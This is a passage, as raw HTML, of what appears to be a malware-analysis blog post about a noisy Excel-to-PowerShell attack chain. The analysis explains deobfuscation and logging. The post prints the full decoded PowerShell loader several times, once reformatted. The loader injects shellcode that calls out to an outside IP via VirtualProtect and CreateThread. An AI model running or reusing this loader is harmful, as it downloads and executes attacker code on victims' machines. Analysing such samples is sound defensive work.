0JtQUN3QWZRQmtBRFVBTEFCOUFEVUFNd0FzQUgwQU5RQXpBQ3dBZlFBMkFHRUFMQUI5QURBQU13QXNBSDBBTlFBekFDd0FmUUExQURNQUxBQjlBRFlBWVFBc0FIMEFOUUF3QUN3QWZRQmxBRGdBTEFCOUFEZ0FOQUFzQUgwQU1BQXdBQ3dBZlFBd0FEQUFMQUI5QURBQU1BQXNBSDBBTWdCbUFDd0FmUUF6QURnQUxBQjlBRFFBWWdBc0FIMEFOZ0E0QUN3QWZRQXpBRGdBTEFCOUFETUFPUUFzQUgwQU1BQXdBQ3dBZlFBMUFEQUFMQUI5QURZQU9BQXNBSDBBTlFBM0FDd0FmUUE0QURrQUxBQjlBRGtBWmdBc0FIMEFZd0EyQUN3QWZRQm1BR1lBTEFCOUFHUUFOUUFzQUgwQU9BQTVBQ3dBZlFCakFEWUFMQUI5QURVQU13QXNBSDBBTmdBNEFDd0FmUUF3QURBQUxBQjlBREFBTWdBc0FIMEFOZ0F3QUN3QWZRQTRBRFFBTEFCOUFEVUFNd0FzQUgwQU5RQXpBQ3dBZlFBMUFETUFMQUI5QURVQU53QXNBSDBBTlFBekFDd0FmUUExQURZQUxBQjlBRFlBT0FBc0FIMEFaUUJpQUN3QWZRQTFBRFVBTEFCOUFESUFaUUFzQUgwQU13QmlBQ3dBZlFCbUFHWUFMQUI5QUdRQU5RQXNBSDBBT1FBMkFDd0FmUUEyQUdFQUxBQjlBREFBWVFBc0FIMEFOUUJtQUN3QWZRQTFBRE1BTEFCOUFEVUFNd0FzQUgwQU5RQXpBQ3dBZlFBMUFETUFMQUI5QURVQU5nQXNBSDBBTmdBNEFDd0FmUUF5QUdRQUxBQjlBREFBTmdBc0FIMEFNUUE0QUN3QWZRQTNBR0lBTEFCOUFHWUFaZ0FzQUgwQVpBQTFBQ3dBZlFBNEFEVUFMQUI5QUdNQU1BQXNBSDBBTndBMUFDd0FmUUF4QURZQUxBQjlBRFlBT0FBc0FIMEFPQUE0QUN3QWZRQXhBRE1BTEFCOUFEQUFNQUFzQUgwQU1BQXdBQ3dBZlFBMkFEZ0FMQUI5QURRQU5BQXNBSDBBWmdBd0FDd0FmUUF6QURVQUxBQjlBR1VBTUFBc0FIMEFaZ0JtQUN3QWZRQmtBRFVBTEFCOUFEUUFaZ0FzQUgwQU53QTFBQ3dBZlFCbEFERUFMQUI5QURZQU9BQXNBSDBBWmdBd0FDd0FmUUJpQURVQUxBQjlBR0VBTWdBc0FIMEFOUUEyQUN3QWZRQm1BR1lBTEFCOUFHUUFOUUFzQUgwQU5nQmhBQ3dBZlFBMEFEQUFMQUI5QURZQU9BQXNBSDBBTUFBd0FDd0FmUUF4QURBQUxBQjlBREFBTUFBc0FIMEFNQUF3QUN3QWZRQTJBRGdBTEFCOUFEQUFNQUFzQUgwQU1BQXdBQ3dBZlFBMEFEQUFMQUI5QURBQU1BQXNBSDBBTlFBekFDd0FmUUEyQURnQUxBQjlBRFVBT0FBc0FIMEFZUUEwQUN3QWZRQTFBRE1BTEFCOUFHVUFOUUFzQUgwQVpnQm1BQ3dBZlFCa0FEVUFMQUI5QURrQU13QXNBSDBBTlFBekFDd0FmUUExQURNQUxBQjlBRGdBT1FBc0FIMEFaUUEzQUN3QWZRQTFBRGNBTEFCOUFEWUFPQUFzQUgwQU1BQXdBQ3dBZlFBeUFEQUFMQUI5QURBQU1BQXNBSDBBTUFBd0FDd0FmUUExQURNQUxBQjlBRFVBTmdBc0FIMEFOZ0E0QUN3QWZRQXhBRElBTEFCOUFEa0FOZ0FzQUgwQU9BQTVBQ3dBZlFCbEFESUFMQUI5QUdZQVpnQXNBSDBBWkFBMUFDd0FmUUE0QURVQUxBQjlBR01BTUFBc0FIMEFOd0EwQUN3QWZRQmpBR1FBTEFCOUFEZ0FZZ0FzQUgwQU1BQTNBQ3dBZlFBd0FERUFMQUI5QUdNQU13QXNBSDBBT0FBMUFDd0FmUUJqQURBQUxBQjlBRGNBTlFBc0FIMEFaUUExQUN3QWZRQTFBRGdBTEFCOUFHTUFNd0FzQUgwQU5RQm1BQ3dBZlFCbEFEZ0FMQUI5QURjQVpBQXNBSDBBWmdCbUFDd0FmUUJtQUdZQUxBQjlBR1lBWmdBc0FIMEFNd0F4QUN3QWZRQXpBREFBTEFCOUFESUFaUUFzQUgwQU13QTBBQ3dBZlFBekFEY0FMQUI5QURJQVpRQXNBSDBBTXdBMEFDd0FmUUF6QURjQUxBQjlBRElBWlFBc0FIMEFNd0F5QUN3QWZRQXpBRFlBTEFCOUFEQUFNQUFpQURzQUpBQmFBSFVBUFFCQkFHUUFaQUF0QUZRQWVRQndBR1VBSUFBdEFIQUFZUUJ6QUhNQUlBQXRBRzBBSUFBa0FFc0FkUUFnQUMwQVRnQmhBRzBBWlFBZ0FDSUFWUUJXQUNJQUlBQXRBRzRBWVFCdEFHVUFjd0FnQUhjQVdBQnlBRHNBSkFCYUFIVUFQUUFrQUZvQWRRQXVBSElBWlFCd0FHd0FZUUJqQUdVQUtBQWlBSGNBV0FCeUFDSUFMQUFnQUNJQVZ3QnBBQ0lBS3dBaUFHNEFJZ0FyQUNJQU13QXlBRVlBZFFCdUFHTUFkQUJwQUc4QWJnQnpBQ0lBS1FBN0FGc0FZZ0I1QUhRQVpRQmJBRjBBWFFBa0FGUUFWd0FnQUQwQUlBQWtBRlFBVndBdUFISUFaUUJ3QUd3QVlRQmpBR1VBS0FBaUFIMEFJZ0FzQUNJQVVRQm9BRVVBWVFCNEFDSUFLUUF1QUhJQVpRQndBR3dBWVFCakFHVUFLQUFpQUZFQWFBQkZBR0VBSWdBc0FDQUFJZ0F3QUNJQUtRQXVBRk1BY0FCc0FHa0FkQUFvQUNJQUxBQWlBQ2tBT3dBa0FGSUFUZ0E5QURBQWVBQXhBREFBTUFBM0FEc0FhUUJtQUNBQUtBQWtBRlFBVndBdUFFd0FJQUF0QUdjQWRBQWdBREFBZUFBeEFEQUFNQUEzQUNrQWV3QWtBRklBVGdBOUFDUUFWQUJYQUM0QVRBQjlBRHNBSkFCa0FGWUFQUUFrQUZvQWRRQTZBRG9BWXdCaEFHd0FiQUJ2QUdNQUtBQXdBSGdBTVFBd0FEQUFOd0FzQUNBQU1RQXBBRHNBV3dCVkFFa0FiZ0IwQURZQU5BQmRBQ1FBVkFCaEFHOEFJQUE5QUNBQU1BQTdBR1lBYndCeUFDZ0FKQUIyQUZnQVBRQXdBRHNBSkFCMkFGZ0FJQUF0QUd3QVpRQW9BQ1FBVkFCWEFDNEFUQUJsQUc0QVp3QjBBR2dBTFFBeEFDa0FPd0FrQUhZQVdBQXJBQ3NBS1FCN0FDUUFXZ0IxQURvQU9nQnRBR1VBYlFCekFHVUFkQUFvQUZzQVNRQnVBSFFBVUFCMEFISUFYUUFvQUNRQVpBQldBQzRBVkFCdkFFa0FiZ0IwQURNQU1nQW9BQ2tBS3dBa0FIWUFXQUFwQUN3QUlBQWtBRlFBVndCYkFDUUFkZ0JZQUYwQUxBQWdBREVBS1FCOUFEc0FKQUJhQUhVQU9nQTZBRllBYVFCeUFIUUFkUUJoQUd3QVVBQnlBRzhBZEFCbEFHTUFkQUFvQUNRQVpBQldBQ3dBSUFBd0FIZ0FNUUF3QURBQU53QXNBQ0FBTUFCNEFEUUFNQUFzQUNBQVd3QlNBR1VBWmdCZEFDUUFWQUJoQUc4QUtRQTdBQ1FBV2dCMUFEb0FPZ0JEQUhJQVpRQmhBSFFBWlFCVUFHZ0FjZ0JsQUdFQVpBQW9BREFBTEFBd0FIZ0FNQUF3QUN3QUpBQmtBRllBTEFBd0FDd0FNQUFzQURBQUtRQTdBQ2NBT3dBa0FIRUFlZ0E5QUZzQVF3QnZBRzRBZGdCbEFISUFkQUJkQURvQU9nQlVBRzhBUWdCaEFITUFaUUEyQURRQVV3QjBBSElBYVFCdUFHY0FLQUJiQUZRQVpRQjRBSFFBTGdCRkFHNEFZd0J2QUdRQWFRQnVBR2NBWFFBNkFEb0FWUUJ1QUdrQVl3QnZBR1FBWlFBdUFFY0FaUUIwQUVJQWVRQjBBR1VBY3dBb0FDUUFhUUJ6QUNrQUtRQTdBQ1FBZFFCdEFEMEFJZ0J3QUc4QWR3QmxBSElBY3dCb0FHVUFiQUJzQUNJQU93QWtBRkFBVFFBOUFDSUFWd0JwQUc0QVpBQnZBSGNBY3dBaUFEc0FKQUJyQUZnQWRBQWdBRDBBSUFBaUFFTUFPZ0JjQUNRQVVBQk5BRndBY3dCNUFITUFkd0J2QUhjQU5nQTBBRndBSkFCUUFFMEFKQUIxQUcwQVhBQjJBREVBTGdBd0FGd0FKQUIxQUcwQUlnQTdBQ1FBU1FCMEFGZ0FJQUE5QUNBQUp3QlVBSElBSWdBckFDSUFkUUFpQUNzQUlnQmxBQ2NBT3dCcEFHWUFLQUJiQUdVQWJnQjJBR2tBY2dCdkFHNEFiUUJsQUc0QWRBQmRBRG9BT2dCSkFITUFOZ0EwQUVJQWFRQjBBRThBY0FCbEFISUFZUUIwQUdrQWJnQm5BRk1BZVFCekFIUUFaUUJ0QUNBQUxRQmxBSEVBSUFBbkFDUUFTUUIwQUZnQUp3QXBBSHNBSkFCMUFHMEFQUUFnQUNRQWF3QllBSFFBZlFBN0FDUUFkZ0JHQUQwQUlnQWdBQ1FBZFFCdEFDQUFVd0IzQUdZQVdBQWdBQ1FBY1FCNkFDSUFPd0FrQUhZQVJnQTlBQ1FBZGdCR0FDNEFjZ0JsQUhBQWJBQmhBR01BWlFBb0FDSUFVd0IzQUdZQVdBQWlBQ3dBSUFBaUFDMEFiZ0J2QUdVQWVBQnBBSFFBSUFBdEFHVUFJZ0FwQURzQWFRQmxBSGdBSUFBa0FIWUFSZ0E9" target="_blank">GCHQ's extremely useful Cyberchef</a>, you'll get this:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; widows: 2;"><span style="background-color: #eeeeee; font-variant-ligatures: no-common-ligatures;"><font face="courier">$is='$Ku=''[DllImport(("msvcrt"+"."+"dll"))]public static extern IntPtr calloc(uint dwSize, uint amount);[DllImport("kernel32"+"."+"dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("kernel32"+"."+"dll")]public static extern IntPtr VirtualProtect(IntPtr lpStartAddress, uint dwSize, uint flNewProtect, out uint Tao);[DllImport("msvcrt"+"."+"dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$TW="}e8,}82,}00,}00,}00,}60,}89,}e5,}31,}c0,}64,}8b,}50,}30,}8b,}52,}0c,}8b,}52,}14,}8b,}72,}28,}0f,}b7,}4a,}26,}31,}ff,}ac,}3c,}61,}7c,}02,}2c,}20,}c1,}cf,}0d,}01,}c7,}e2,}f2,}52,}57,}8b,}52,}10,}8b,}4a,}3c,}8b,}4c,}11,}78,}e3,}48,}01,}d1,}51,}8b,}59,}20,}01,}d3,}8b,}49,}18,}e3,}3a,}49,}8b,}34,}8b,}01,}d6,}31,}ff,}ac,}c1,}cf,}0d,}01,}c7,}38,}e0,}75,}f6,}03,}7d,}f8,}3b,}7d,}24,}75,}e4,}58,}8b,}58,}24,}01,}d3,}66,}8b,}0c,}4b,}8b,}58,}1c,}01,}d3,}8b,}04,}8b,}01,}d0,}89,}44,}24,}24,}5b,}5b,}61,}59,}5a,}51,}ff,}e0,}5f,}5f,}5a,}8b,}12,}eb,}8d,}5d,}68,}6e,}65,}74,}00,}68,}77,}69,}6e,}69,}54,}68,}4c,}77,}26,}07,}ff,}d5,}31,}db,}53,}53,}53,}53,}53,}68,}3a,}56,}79,}a7,}ff,}d5,}53,}53,}6a,}03,}53,}53,}6a,}50,}e8,}84,}00,}00,}00,}2f,}38,}4b,}68,}38,}39,}00,}50,}68,}57,}89,}9f,}c6,}ff,}d5,}89,}c6,}53,}68,}00,}02,}60,}84,}53,}53,}53,}57,}53,}56,}68,}eb,}55,}2e,}3b,}ff,}d5,}96,}6a,}0a,}5f,}53,}53,}53,}53,}56,}68,}2d,}06,}18,}7b,}ff,}d5,}85,}c0,}75,}16,}68,}88,}13,}00,}00,}68,}44,}f0,}35,}e0,}ff,}d5,}4f,}75,}e1,}68,}f0,}b5,}a2,}56,}ff,}d5,}6a,}40,}68,}00,}10,}00,}00,}68,}00,}00,}40,}00,}53,}68,}58,}a4,}53,}e5,}ff,}d5,}93,}53,}53,}89,}e7,}57,}68,}00,}20,}00,}00,}53,}56,}68,}12,}96,}89,}e2,}ff,}d5,}85,}c0,}74,}cd,}8b,}07,}01,}c3,}85,}c0,}75,}e5,}58,}c3,}5f,}e8,}7d,}ff,}ff,}ff,}31,}30,}2e,}34,}37,}2e,}34,}37,}2e,}32,}36,}00";$Zu=Add-Type -pass -m $Ku -Name "UV" -names wXr;$Zu=$Zu.replace("wXr", "Wi"+"n"+"32Functions");[byte[]]$TW = $TW.replace("}","QhEax").replace("QhEa", "0").Split(",");$RN=0x1007;if ($TW.L -gt 0x1007){$RN=$TW.L};$dV=$Zu::calloc(0x1007, 1);[UInt64]$Tao = 0;for($vX=0;$vX -le($TW.Length-1);$vX++){$Zu::memset([IntPtr]($dV.ToInt32()+$vX), $TW[$vX], 1)};$Zu::VirtualProtect($dV, 0x1007, 0x40, [Ref]$Tao);$Zu::CreateThread(0,0x00,$dV,0,0,0);';$qz=[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($is));$um="powershell";$PM="Windows";$kXt = "C:\$PM\syswow64\$PM$um\v1.0\$um";$ItX = 'Tr"+"u"+"e';if([environment]::Is64BitOperatingSystem -eq '$ItX'){$um= $kXt};$vF=" $um SwfX $qz";$vF=$vF.replace("SwfX", "-noexit -e");iex $vF</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">We could spend an entire post picking this apart. For our purposes and for expediency, let's call out a few things about it and move on. According to the <a href="https://twitter.com/lee_holmes" style="font-style: normal;" target="_blank">esteemable polymath Lee Holmes</a>, the proper way to attempt deobfuscation of obfuscated PowerShell is to run it in a VM with the latest PowerShell installed and all PS logging enabled, then review the logs post execution. The reason for this is that PowerShell has <i>side effects</i>, which is to say executing PS, even if you were to replace the </font><font face="courier">iex $vF</font><font face="inherit"> called near the end of the output above with something like </font><font face="courier">Write-Host $vF</font><font face="inherit">, could cause changes outside the scope.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;">The above has already executed on our victim system and was logged in PowerShell's Operational log as a 4104 event:</span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><br /></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">$Ku='[DllImport(("msvcrt"+"."+"dll"))]public static extern IntPtr calloc(uint dwSize, uint amount);[DllImport("kernel32"+"."+"dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("kernel32"+"."+"dll")]public static extern IntPtr VirtualProtect(IntPtr lpStartAddress, uint dwSize, uint flNewProtect, out uint Tao);[DllImport("msvcrt"+"."+"dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);';$TW="}e8,}82,}00,}00,}00,}60,}89,}e5,}31,}c0,}64,}8b,}50,}30,}8b,}52,}0c,}8b,}52,}14,}8b,}72,}28,}0f,}b7,}4a,}26,}31,}ff,}ac,}3c,}61,}7c,}02,}2c,}20,}c1,}cf,}0d,}01,}c7,}e2,}f2,}52,}57,}8b,}52,}10,}8b,}4a,}3c,}8b,}4c,}11,}78,}e3,}48,}01,}d1,}51,}8b,}59,}20,}01,}d3,}8b,}49,}18,}e3,}3a,}49,}8b,}34,}8b,}01,}d6,}31,}ff,}ac,}c1,}cf,}0d,}01,}c7,}38,}e0,}75,}f6,}03,}7d,}f8,}3b,}7d,}24,}75,}e4,}58,}8b,}58,}24,}01,}d3,}66,}8b,}0c,}4b,}8b,}58,}1c,}01,}d3,}8b,}04,}8b,}01,}d0,}89,}44,}24,}24,}5b,}5b,}61,}59,}5a,}51,}ff,}e0,}5f,}5f,}5a,}8b,}12,}eb,}8d,}5d,}68,}6e,}65,}74,}00,}68,}77,}69,}6e,}69,}54,}68,}4c,}77,}26,}07,}ff,}d5,}31,}db,}53,}53,}53,}53,}53,}68,}3a,}56,}79,}a7,}ff,}d5,}53,}53,}6a,}03,}53,}53,}6a,}50,}e8,}84,}00,}00,}00,}2f,}38,}4b,}68,}38,}39,}00,}50,}68,}57,}89,}9f,}c6,}ff,}d5,}89,}c6,}53,}68,}00,}02,}60,}84,}53,}53,}53,}57,}53,}56,}68,}eb,}55,}2e,}3b,}ff,}d5,}96,}6a,}0a,}5f,}53,}53,}53,}53,}56,}68,}2d,}06,}18,}7b,}ff,}d5,}85,}c0,}75,}16,}68,}88,}13,}00,}00,}68,}44,}f0,}35,}e0,}ff,}d5,}4f,}75,}e1,}68,}f0,}b5,}a2,}56,}ff,}d5,}6a,}40,}68,}00,}10,}00,}00,}68,}00,}00,}40,}00,}53,}68,}58,}a4,}53,}e5,}ff,}d5,}93,}53,}53,}89,}e7,}57,}68,}00,}20,}00,}00,}53,}56,}68,}12,}96,}89,}e2,}ff,}d5,}85,}c0,}74,}cd,}8b,}07,}01,}c3,}85,}c0,}75,}e5,}58,}c3,}5f,}e8,}7d,}ff,}ff,}ff,}31,}30,}2e,}34,}37,}2e,}34,}37,}2e,}32,}36,}00";$Zu=Add-Type -pass -m $Ku -Name "UV" -names wXr;$Zu=$Zu.replace("wXr", "Wi"+"n"+"32Functions");[byte[]]$TW = $TW.replace("}","QhEax").replace("QhEa", "0").Split(",");$RN=0x1007;if ($TW.L -gt 0x1007){$RN=$TW.L};$dV=$Zu::calloc(0x1007, 1);[UInt64]$Tao = 0;for($vX=0;$vX -le($TW.Length-1);$vX++){$Zu::memset([IntPtr]($dV.ToInt32()+$vX), $TW[$vX], 1)};$Zu::VirtualProtect($dV, 0x1007, 0x40, [Ref]$Tao);$Zu::CreateThread(0,0x00,$dV,0,0,0);</span></p></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">This is not so different from what we saw above. This is passed as an argument to yet another PowerShell process. To recap we had Excel spawn a PowerShell building an obfuscated command line that was passed to another PowerShell, shown above once removed (white text), which spawns another PowerShell that runs the code above in black. If you're keeping track, it's a noisy attack.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Again a full accounting requires more work than we'll go into now, but let's spend a little time analyzing this. First, I find it helpful to put this into an IDE that can make sense of PowerShell and clean things up a bit.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><div style="background-color: #1e1e1e; color: #d4d4d4; font-family: menlo, monaco, "courier new", monospace; font-size: 12px; line-height: 18px; white-space: pre;"><div><span style="color: #9cdcfe;">$Ku</span>=<span style="color: #ce9178;">'[DllImport(("msvcrt"+"."+"dll"))]public static extern IntPtr calloc(uint dwSize, uint `</span></div><div><span style="color: #ce9178;"> amount)`</span></div><div><span style="color: #ce9178;">[DllImport("kernel32"+"."+"dll")]public static extern IntPtr CreateThread(IntPtr `</span></div><div><span style="color: #ce9178;"> lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, `</span></div><div><span style="color: #ce9178;"> uint dwCreationFlags, IntPtr lpThreadId)`</span></div><div><span style="color: #ce9178;">[DllImport("kernel32"+"."+"dll")]public static extern IntPtr VirtualProtect(IntPtr `</span></div><div><span style="color: #ce9178;"> lpStartAddress, uint dwSize, uint flNewProtect, out uint Tao)`</span></div><div><span style="color: #ce9178;">[DllImport("msvcrt"+"."+"dll")]public static extern IntPtr memset(IntPtr dest, uint src, `</span></div><div><span style="color: #ce9178;"> uint count);'</span></div><br /><div><span style="color: #9cdcfe;">$TW</span>=<span style="color: #ce9178;">"}e8,}82,}00,}00,}00,}60,}89,}e5,}31,}c0,}64,}8b,}50,}30,}8b,}52,}0c,}8b,}52,}14,}8b,`</span></div><div><span style="color: #ce9178;">}72,}28,}0f,}b7,}4a,}26,}31,}ff,}ac,}3c,}61,}7c,}02,}2c,}20,}c1,}cf,}0d,}01,}c7,}e2,}f2,`</span></div><div><span style="color: #ce9178;">}52,}57,}8b,}52,}10,}8b,}4a,}3c,}8b,}4c,}11,}78,}e3,}48,}01,}d1,}51,}8b,}59,}20,}01,}d3,`</span></div><div><span style="color: #ce9178;">}8b,}49,}18,}e3,}3a,}49,}8b,}34,}8b,}01,}d6,}31,}ff,}ac,}c1,}cf,}0d,}01,}c7,}38,}e0,}75,`</span></div><div><span style="color: #ce9178;">}f6,}03,}7d,}f8,}3b,}7d,}24,}75,}e4,}58,}8b,}58,}24,}01,}d3,}66,}8b,}0c,}4b,}8b,}58,}1c,`</span></div><div><span style="color: #ce9178;">}01,}d3,}8b,}04,}8b,}01,}d0,}89,}44,}24,}24,}5b,}5b,}61,}59,}5a,}51,}ff,}e0,}5f,}5f,}5a,`</span></div><div><span style="color: #ce9178;">}8b,}12,}eb,}8d,}5d,}68,}6e,}65,}74,}00,}68,}77,}69,}6e,}69,}54,}68,}4c,}77,}26,}07,}ff,`</span></div><div><span style="color: #ce9178;">}d5,}31,}db,}53,}53,}53,}53,}53,}68,}3a,}56,}79,}a7,}ff,}d5,}53,}53,}6a,}03,}53,}53,}6a,`</span></div><div><span style="color: #ce9178;">}50,}e8,}84,}00,}00,}00,}2f,}38,}4b,}68,}38,}39,}00,}50,}68,}57,}89,}9f,}c6,}ff,}d5,}89,`</span></div><div><span style="color: #ce9178;">}c6,}53,}68,}00,}02,}60,}84,}53,}53,}53,}57,}53,}56,}68,}eb,}55,}2e,}3b,}ff,}d5,}96,}6a,`</span></div><div><span style="color: #ce9178;">}0a,}5f,}53,}53,}53,}53,}56,}68,}2d,}06,}18,}7b,}ff,}d5,}85,}c0,}75,}16,}68,}88,}13,}00,`</span></div><div><span style="color: #ce9178;">}00,}68,}44,}f0,}35,}e0,}ff,}d5,}4f,}75,}e1,}68,}f0,}b5,}a2,}56,}ff,}d5,}6a,}40,}68,}00,`</span></div><div><span style="color: #ce9178;">}10,}00,}00,}68,}00,}00,}40,}00,}53,}68,}58,}a4,}53,}e5,}ff,}d5,}93,}53,}53,}89,}e7,}57,`</span></div><div><span style="color: #ce9178;">}68,}00,}20,}00,}00,}53,}56,}68,}12,}96,}89,}e2,}ff,}d5,}85,}c0,}74,}cd,}8b,}07,}01,}c3,`</span></div><div><span style="color: #ce9178;">}85,}c0,}75,}e5,}58,}c3,}5f,}e8,}7d,}ff,}ff,}ff,}31,}30,}2e,}34,}37,}2e,}34,}37,}2e,}32,`</span></div><div><span style="color: #ce9178;">}36,}00"</span></div><br /><div><span style="color: #9cdcfe;">$Zu</span>=<span style="color: #dcdcaa;">Add-Type</span> -pass -m <span style="color: #9cdcfe;">$Ku</span> -Name <span style="color: #ce9178;">"UV"</span> -names wXr</div><div><span style="color: #9cdcfe;">$Zu</span>=<span style="color: #9cdcfe;">$Zu</span><span style="color: #dcdcaa;">.replace</span>(<span style="color: #ce9178;">"wXr"</span>, <span style="color: #ce9178;">"Wi"</span>+<span style="color: #ce9178;">"n"</span>+<span style="color: #ce9178;">"32Functions"</span>)</div><br /><div>[<span style="color: #569cd6;">byte</span>[]]<span style="color: #9cdcfe;">$TW</span> = <span style="color: #9cdcfe;">$TW</span><span style="color: #dcdcaa;">.replace</span>(<span style="color: #ce9178;">"}"</span>,<span style="color: #ce9178;">"QhEax"</span>).replace(<span style="color: #ce9178;">"QhEa"</span>, <span style="color: #ce9178;">"0"</span>).Split(<span style="color: #ce9178;">","</span>)</div><br /><div><span style="color: #9cdcfe;">$RN</span>=<span style="color: #b5cea8;">0x1007</span></div><br /><div><span style="color: #c586c0;">if</span> (<span style="color: #9cdcfe;">$TW</span><span style="color: #dcdcaa;">.L</span> -gt <span style="color: #b5cea8;">0x1007</span>)</div><div>{</div><div> <span style="color: #9cdcfe;">$RN</span>=<span style="color: #9cdcfe;">$TW</span><span style="color: #dcdcaa;">.L</span></div><div>}</div><br /><div><span style="color: #9cdcfe;">$dV</span>=<span style="color: #9cdcfe;">$Zu</span>::calloc(<span style="color: #b5cea8;">0x1007</span>, <span style="color: #b5cea8;">1</span>)</div><div>[<span style="color: #569cd6;">UInt64</span>]<span style="color: #9cdcfe;">$Tao</span> = <span style="color: #b5cea8;">0</span></div><div><span style="color: #c586c0;">for</span>(<span style="color: #9cdcfe;">$vX</span>=<span style="color: #b5cea8;">0</span>; <span style="color: #9cdcfe;">$vX</span> -le(<span style="color: #9cdcfe;">$TW</span><span style="color: #dcdcaa;">.Length</span>-<span style="color: #b5cea8;">1</span>); <span style="color: #9cdcfe;">$vX</span>++)</div><div>{</div><div> <span style="color: #9cdcfe;">$Zu</span>::memset([<span style="color: #569cd6;">IntPtr</span>](<span style="color: #9cdcfe;">$dV</span><span style="color: #dcdcaa;">.ToInt32</span>()+<span style="color: #9cdcfe;">$vX</span>), <span style="color: #9cdcfe;">$TW</span>[<span style="color: #9cdcfe;">$vX</span>], <span style="color: #b5cea8;">1</span>)</div><div>}</div><br /><div><span style="color: #9cdcfe;">$Zu</span>::VirtualProtect(<span style="color: #9cdcfe;">$dV</span>, <span style="color: #b5cea8;">0x1007</span>, <span style="color: #b5cea8;">0x40</span>, [<span style="color: #569cd6;">Ref</span>]<span style="color: #9cdcfe;">$Tao</span>)</div><div><span style="color: 